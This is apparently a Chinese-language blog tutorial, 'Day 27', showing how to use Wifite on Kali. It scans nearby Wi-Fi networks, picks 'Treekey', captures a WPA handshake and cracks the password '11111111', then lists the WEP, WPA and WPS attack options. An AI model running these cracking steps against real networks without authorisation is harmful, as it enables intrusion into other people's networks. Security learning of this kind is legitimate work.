Day 27 Wireless Attacks - 无线攻击 (Wifite)

今天要来体验的工具是Wifite，标榜只要简单的指令，不需繁琐的步骤或额外的参数就能自动完成扫描、破解wifi密码，且支援WEP、WPA 和 WPS多种标准。话不多说，直接开始体验吧

Wifite位於Kali的06-Wireless Attacks分类，直接执行可以看到使用方式

sudo wifite

结果可以拆成几个区块来看，第一块显示了工具的基本资讯，包含了版本、作者等等，然後有些过程建议备有的套件如果没装也会列出

   .               .    
 .´  ·  .     .  ·  `.  wifite2 2.5.2
 :  :  :  (¯)  :  :  :  a wireless auditor by @derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´    https://github.com/kimocoder/wifite2

 [!] Warning: Recommended app bully was not found. install @ https://github.com/aanarchyy/bully
 [!] Warning: Recommended app pyrit was not found. install @ https://github.com/JPaulMora/Pyrit/wiki
 [!] Warning: Recommended app hashcat was not found. install @ https://hashcat.net/hashcat/
 [!] Warning: Recommended app hcxdumptool was not found. install @ https://github.com/ZerBea/hcxdumptool
 [!] Warning: Recommended app hcxpcaptool was not found. install @ https://github.com/ZerBea/hcxtools
 [!] Warning: Recommended app macchanger was not found. install @ apt-get install macchanger

接下来这块资讯显示了介面进入监看模式，所以结束了NetworkManger process

 [!] Conflicting processes: avahi-daemon (PID 635), NetworkManager (PID 640), wpa_supplicant (PID 673), avahi-daemon (PID 698)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill
 [+] Using wlp2s0mon already in monitor mode 

然後就会进入扫描阶段，可以在中途Ctrl + C来中断扫描，然後Wifite会询问目标是哪个，这边我输入的是3，也就是Treekey那台

   NUM                      ESSID   CH  ENCR   POWER  WPS?  CLIENT                               
   ---  -------------------------  ---  -----  -----  ----  ------
     1                  ken-2.4G     1  WPA-P   43db    no                                       
     2                 cheng1230     6  WPA-P   43db    no                                       
     3                   Treekey    13  WPA-P   22db  lock    1                                 
     4                     LIANG    11  WPA-P   22db    no                                       
     5                  chandler     6  WPA-P   22db    no                                       
     6                 ASUS 2.4G     6  WPA-P   17db  lock                                       
     7                     dong4     1  WPA-P   16db   yes                                       
     8          huangfamily-2.4G     1  WPA-P   16db   yes                                                                                                                                       
 [+] select target(s) (1-16) separated by commas, dashes or all: 3      

接着就是一连串的破解过程，最後会产出.cap以及cracked.txt，可以看到有破解出密码111111

[+] (1/1) Starting attacks against AA:AA:AA:AA:AA:AA (Treekey)
[+] Treekey (50db) WPS Pixie-Dust: [4m56s] Failed: Because access point is Locked               
[+] Treekey (54db) WPS NULL PIN: [4m56s] Failed: Because access point is Locked                 
[+] Treekey (44db) WPS PIN Attack: [5s] Failed: Because access point is Locked                 
[!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcaptool
[+] Treekey (47db) WPA Handshake capture: Discovered new client: AA:AA:AA:AA:AA:AA             
[+] Treekey (45db) WPA Handshake capture: Captured handshake                                   
[+] saving copy of handshake to hs/handshake_Treekey_2021-10-12T21-22-06.cap saved

[+] analysis of captured handshake file:
[+]   tshark: .cap file contains a valid handshake for AA:AA:AA:AA:AA:AA
[!] aircrack: .cap file does not contain a valid handshake
[+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
[+] Cracking WPA Handshake: 0.01% ETA: 1m47s @ 1898.7kps (current key: 11111111)               
[+] Cracked WPA Handshake PSK: 11111111

[+]   Access Point Name: Treekey
[+]  Access Point BSSID: AA:AA:AA:AA:AA:AA
[+]          Encryption: WPA
[+]      Handshake File: hs/handshake_Treekey_2021-10-12T21-22-06.cap
[+]      PSK (password): 11111111
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting

以上是最简易的Wifite最简易的用法，其他用法可以参考wifite -h，像是针对特定模式

WEP:
  --wep                                      Show only WEP-encrypted networks
  --require-fakeauth                         Fails attacks if fake-auth fails (default: off)
  --keep-ivs                                 Retain .IVS files and reuse when cracking (default: off)

WPA:
  --wpa                                      Show only WPA-encrypted networks (includes WPS)
  --new-hs                                   Captures new handshakes, ignores existing handshakes in hs (default:
                                             off)
  --dict [file]                              File containing passwords for cracking (default: /usr/share/dict/wordlist-
                                             probable.txt)                                                                                                                                                                                   

WPS:
  --wps                                      Show only WPS-enabled networks
  --wps-only                                 Only use WPS PIN & Pixie-Dust attacks (default:
                                             off)
  --bully                                    Use bully program for WPS PIN & Pixie-Dust attacks (default:
                                             reaver)
  --reaver                                   Use reaver program for WPS PIN & Pixie-Dust attacks (default:
                                             reaver)
  --ignore-locks                             Do not stop WPS PIN attack if AP becomes locked (default:
                                             stop)